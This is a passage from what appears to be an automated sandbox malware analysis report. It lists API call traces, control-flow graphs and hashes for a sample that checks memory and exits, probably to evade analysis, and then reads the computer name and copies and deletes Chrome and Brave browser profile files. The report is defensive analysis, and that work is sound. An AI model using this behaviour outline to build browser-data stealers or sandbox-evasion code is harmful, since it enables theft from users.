                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                        • String ID:
                        • API String ID: 3477276466-0
                        • Opcode ID: af1a0ff5241c3a90c754438520e04b1927fcedc128ece8a26995cfb1a08e1c04
                        • Instruction ID: c198a7fe1e627ad52f1e2f8b39106cb3a6a5ebb873988fe9c77b75e9033d5b97
                        • Opcode Fuzzy Hash: af1a0ff5241c3a90c754438520e04b1927fcedc128ece8a26995cfb1a08e1c04
                        • Instruction Fuzzy Hash: 6601D1717802047BF7284A656C1AF6B77EAA785B05F309019F708E7390DAB5A9808668

                        Control-flow Graph
                        control_flow_graph 2805 45ee90-45eeb5 call 442930 2808 45eeb7-45eebf 2805->2808 2809 45eec9-45eecd call 446c40 2805->2809 2808->2809 2810 45eec1-45eec3 lstrcpy 2808->2810 2812 45eed2-45eee8 StrCmpCA 2809->2812 2810->2809 2813 45ef11-45ef18 call 442a20 2812->2813 2814 45eeea-45ef02 call 442a20 call 442930 2812->2814 2819 45ef20-45ef28 2813->2819 2823 45ef45-45efa0 call 442a20 * 10 2814->2823 2824 45ef04-45ef0c 2814->2824 2819->2819 2822 45ef2a-45ef37 call 442930 2819->2822 2822->2823 2830 45ef39 2822->2830 2824->2823 2826 45ef0e-45ef0f 2824->2826 2829 45ef3e-45ef3f lstrcpy 2826->2829 2829->2823 2830->2829
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EEC3
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0045EEDE
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0045EF3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: ERROR
                        • API String ID: 3722407311-2861137601
                        • Opcode ID: 6749f1366a2dc8393156b2be6ed9832d5f3b59c70b1b38c12a56d3983d0de3f6
                        • Instruction ID: d69d0a552f219c416f4b4bc57a545b37b3cea4406c128bc8eb240255b4106739
                        • Opcode Fuzzy Hash: 6749f1366a2dc8393156b2be6ed9832d5f3b59c70b1b38c12a56d3983d0de3f6
                        • Instruction Fuzzy Hash: D5216F317202059BDB25FF7ADD46A9B77A4AF10305F40542EBC4ADB312DF78D90487A8

                        Control-flow Graph
                        control_flow_graph 2886 4410c0-4410cb 2887 4410d0-4410dc 2886->2887 2889 4410de-4410f3 GlobalMemoryStatusEx 2887->2889 2890 4410f5-441106 2889->2890 2891 441112-441114 ExitProcess 2889->2891 2892 441108 2890->2892 2893 44111a-44111d 2890->2893 2892->2891 2894 44110a-441110 2892->2894 2894->2891 2894->2893
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: 91ef0f4fc74faaf15273959cb9bc13ca62f7b8623c8868b577c90aa612c5a6eb
                        • Instruction ID: f7a4570c86f193d05e4e8c5076b8346e83d444313f8d805ee91e92f995796016
                        • Opcode Fuzzy Hash: 91ef0f4fc74faaf15273959cb9bc13ca62f7b8623c8868b577c90aa612c5a6eb
                        • Instruction Fuzzy Hash: 1FF0A7701182455BFB146B74D94A72EF7D9EB0A351F10492BDE9EC22A2E678C8C0917F

                        Control-flow Graph
                        control_flow_graph 2895 458c88-458cc4 StrCmpCA 2898 458cc6-458cc7 ExitProcess 2895->2898 2899 458ccd-458ce6 2895->2899 2901 458ee2-458eef call 442a20 2899->2901 2902 458cec-458cf1 2899->2902 2904 458cf6-458cf9 2902->2904 2905 458ec3-458edc 2904->2905 2906 458cff 2904->2906 2905->2901 2940 458cf3 2905->2940 2908 458d84-458d92 StrCmpCA 2906->2908 2909 458da4-458db8 StrCmpCA 2906->2909 2910 458d06-458d15 lstrlen 2906->2910 2911 458e6f-458e7d StrCmpCA 2906->2911 2912 458e88-458e9a lstrlen 2906->2912 2913 458e56-458e64 StrCmpCA 2906->2913 2914 458d30-458d3f lstrlen 2906->2914 2915 458dbd-458dcb StrCmpCA 2906->2915 2916 458ddd-458deb StrCmpCA 2906->2916 2917 458dfd-458e0b StrCmpCA 2906->2917 2918 458e1d-458e2b StrCmpCA 2906->2918 2919 458e3d-458e4b StrCmpCA 2906->2919 2920 458d5a-458d69 lstrlen 2906->2920 2908->2905 2924 458d98-458d9f 2908->2924 2909->2905 2929 458d17-458d1c call 442a20 2910->2929 2930 458d1f-458d2b call 442930 2910->2930 2911->2905 2933 458e7f-458e86 2911->2933 2934 458ea4-458eb0 call 442930 2912->2934 2935 458e9c-458ea1 call 442a20 2912->2935 2913->2905 2932 458e66-458e6d 2913->2932 2936 458d41-458d46 call 442a20 2914->2936 2937 458d49-458d55 call 442930 2914->2937 2915->2905 2925 458dd1-458dd8 2915->2925 2916->2905 2926 458df1-458df8 2916->2926 2917->2905 2927 458e11-458e18 2917->2927 2918->2905 2928 458e31-458e38 2918->2928 2919->2905 2931 458e4d-458e54 2919->2931 2921 458d73-458d7f call 442930 2920->2921 2922 458d6b-458d70 call 442a20 2920->2922 2955 458eb3-458eb5 2921->2955 2922->2921 2924->2905 2925->2905 2926->2905 2927->2905 2928->2905 2929->2930 2930->2955 2931->2905 2932->2905 2933->2905 2934->2955 2935->2934 2936->2937 2937->2955 2940->2904 2955->2905 2956 458eb7-458eb9 2955->2956 2956->2905 2957 458ebb-458ebd lstrcpy 2956->2957 2957->2905
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 0e283b068cf578668a2bd46796755cd484fefb8b51c6953099a83d7706e19808
                        • Instruction ID: 550f340abb0957dff4de7882be752bfe63b1a38f245d29b098226430db7c6016
                        • Opcode Fuzzy Hash: 0e283b068cf578668a2bd46796755cd484fefb8b51c6953099a83d7706e19808
                        • Instruction Fuzzy Hash: 49E09A60610289EBDB049BB9DC88DCA7BACAF84710B00842DB908A7221DA74ED04C368

                        Control-flow Graph
                        control_flow_graph 2958 462ad0-462b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 462b44-462b59 2958->2959 2960 462b24-462b36 2958->2960
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00462AFF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462B06
                        • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00462B1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 64d1ae9e8dd4b9dce1c8a19f7a9c44fd35e0662c56ff7ef107b773e54c6aceed
                        • Instruction ID: 2e4345245159f6dd53e08154c3fb2dccaf41bb971afd146feb9fbc12bc651fe4
                        • Opcode Fuzzy Hash: 64d1ae9e8dd4b9dce1c8a19f7a9c44fd35e0662c56ff7ef107b773e54c6aceed
                        • Instruction Fuzzy Hash: E801D672A44608ABC714CF99ED45BAEF7F8F744B21F00026BF919E3780D77819008BA5
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004523D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004523F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00452402
                        • lstrlen.KERNEL32(\*.*), ref: 0045240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00452436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00452486
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: c190d98dbde5f981b8d085c98462583308a51e3d8750a7cd5dc2d37cd2fea973
                        • Instruction ID: f3eb42caed11a4e3461dcd94f5738503debbbab5d98d7e00ff9036dad8bfd827
                        • Opcode Fuzzy Hash: c190d98dbde5f981b8d085c98462583308a51e3d8750a7cd5dc2d37cd2fea973
                        • Instruction Fuzzy Hash: 2FA2C470A102169BDB25AF75CE88AAF77B9AF05305F44402BFC09E3352DB78DD458B68
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004416E2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044176C
                        • lstrcat.KERNEL32(00000000), ref: 00441776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004417A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004417EF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004417F9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441825
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441875
                        • lstrcat.KERNEL32(00000000), ref: 0044187F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004418AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004418F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004418FE
                        • lstrlen.KERNEL32(00471794), ref: 00441909
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441929
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441935
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044195B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441966
                        • lstrlen.KERNEL32(\*.*), ref: 00441971
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044198E
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0044199A
                          • Part of subcall function 00464040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0046406D
                          • Part of subcall function 00464040: lstrcpy.KERNEL32(00000000,?), ref: 004640A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004419C3
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441A0E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441A16
                        • lstrlen.KERNEL32(00471794), ref: 00441A21
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A41
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441A4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A76
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441A81
                        • lstrlen.KERNEL32(00471794), ref: 00441A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441AAC
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441AB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441ADE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441AE9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B11
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00441B45
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 00441B70
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00441B8A
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441BC4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441BFB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441C03
                        • lstrlen.KERNEL32(00471794), ref: 00441C0E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C31
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441C3D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C69
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441C74
                        • lstrlen.KERNEL32(00471794), ref: 00441C7F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CA2
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441CAE
                        • lstrlen.KERNEL32(?), ref: 00441CBB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00441CE9
                        • lstrlen.KERNEL32(00471794), ref: 00441CF4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441D14
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441D20
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D46
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441D51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D7D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441DE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441DEB
                        • lstrlen.KERNEL32(00471794), ref: 00441DF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E19
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441E25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E4B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441E56
                        • lstrlen.KERNEL32(00471794), ref: 00441E61
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441E81
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441E8D
                        • lstrlen.KERNEL32(?), ref: 00441E9A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EBA
                        • lstrcat.KERNEL32(00000000,?), ref: 00441EC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F3E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00441F45
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441F9F
                        • lstrlen.KERNEL32(015892A8), ref: 00441FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00441FE3
                        • lstrlen.KERNEL32(00471794), ref: 00441FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044200E
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00442042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044204D
                        • lstrlen.KERNEL32(00471794), ref: 00442058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442075
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00442081
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                        • String ID: \*.*
                        • API String ID: 4127656590-1173974218
                        • Opcode ID: 7cc8ac31e2cac169de00997c63051488748b7aee53f0181903b29850c3b18f27
                        • Instruction ID: 8d0e8d71faaf48132f28d58f759df181d11c47ae699e3540274cedf9ca7818fc
                        • Opcode Fuzzy Hash: 7cc8ac31e2cac169de00997c63051488748b7aee53f0181903b29850c3b18f27
                        • Instruction Fuzzy Hash: C492B971A112169BEB21EF75DD89AAF77B9AF04304F44402AF809A7321DB78DD41CBA4
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DBEF
                        • lstrlen.KERNEL32(00474CA8), ref: 0044DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC17
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 0044DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC4C
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DC8F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0044DCD0
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0044DCF0
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0044DD0A
                        • lstrlen.KERNEL32(0046CFEC), ref: 0044DD1D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DD7B
                        • lstrlen.KERNEL32(00471794), ref: 0044DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDA3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DDAF
                        • lstrlen.KERNEL32(?), ref: 0044DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0044DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DE19
                        • lstrlen.KERNEL32(00471794), ref: 0044DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DE6F
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DE7B
                        • lstrlen.KERNEL32(01588F48), ref: 0044DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DEBB
                        • lstrlen.KERNEL32(00471794), ref: 0044DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DEE6
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DEF2
                        • lstrlen.KERNEL32(015891C8), ref: 0044DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFA5
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DFB1
                        • lstrlen.KERNEL32(01588F48), ref: 0044DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DFF4
                        • lstrlen.KERNEL32(00471794), ref: 0044DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E022
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044E02E
                        • lstrlen.KERNEL32(015891C8), ref: 0044E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0044E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0044E0E7
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E11F
                        • lstrlen.KERNEL32(0158D250), ref: 0044E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0044E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E19F
                        • lstrcat.KERNEL32(00000000), ref: 0044E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0044E1F9
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E22F
                        • lstrlen.KERNEL32(015892A8), ref: 0044E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E261
                        • lstrcat.KERNEL32(00000000,015892A8), ref: 0044E269
                        • lstrlen.KERNEL32(\Brave\Preferences), ref: 0044E274
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E29B
                        • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0044E2A7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E2CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E30F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E349
                        • DeleteFileA.KERNEL32(?), ref: 0044E381
                        • StrCmpCA.SHLWAPI(?,0158D490), ref: 0044E3AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E3F4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E41C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E445
                        • StrCmpCA.SHLWAPI(?,015891C8), ref: 0044E468
                        • StrCmpCA.SHLWAPI(?,01588F48), ref: 0044E47D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E4D9
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0044E4E0
                        • StrCmpCA.SHLWAPI(?,0158D2B0), ref: 0044E58E
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E5C4
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0044E639
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E678
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E6A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E6C7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E70E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E737
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E75C
                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0044E776
                        • DeleteFileA.KERNEL32(?), ref: 0044E7D2
                        • StrCmpCA.SHLWAPI(?,01589298), ref: 0044E7FC
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E88C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E8B5
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E8EE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E916
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E952
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 2635522530-726946144
                        • Opcode ID: 9758ccd3784f37b27e8d541b2e8e1d233ddbfb0b2d76ecf9ff9cc099027c2621
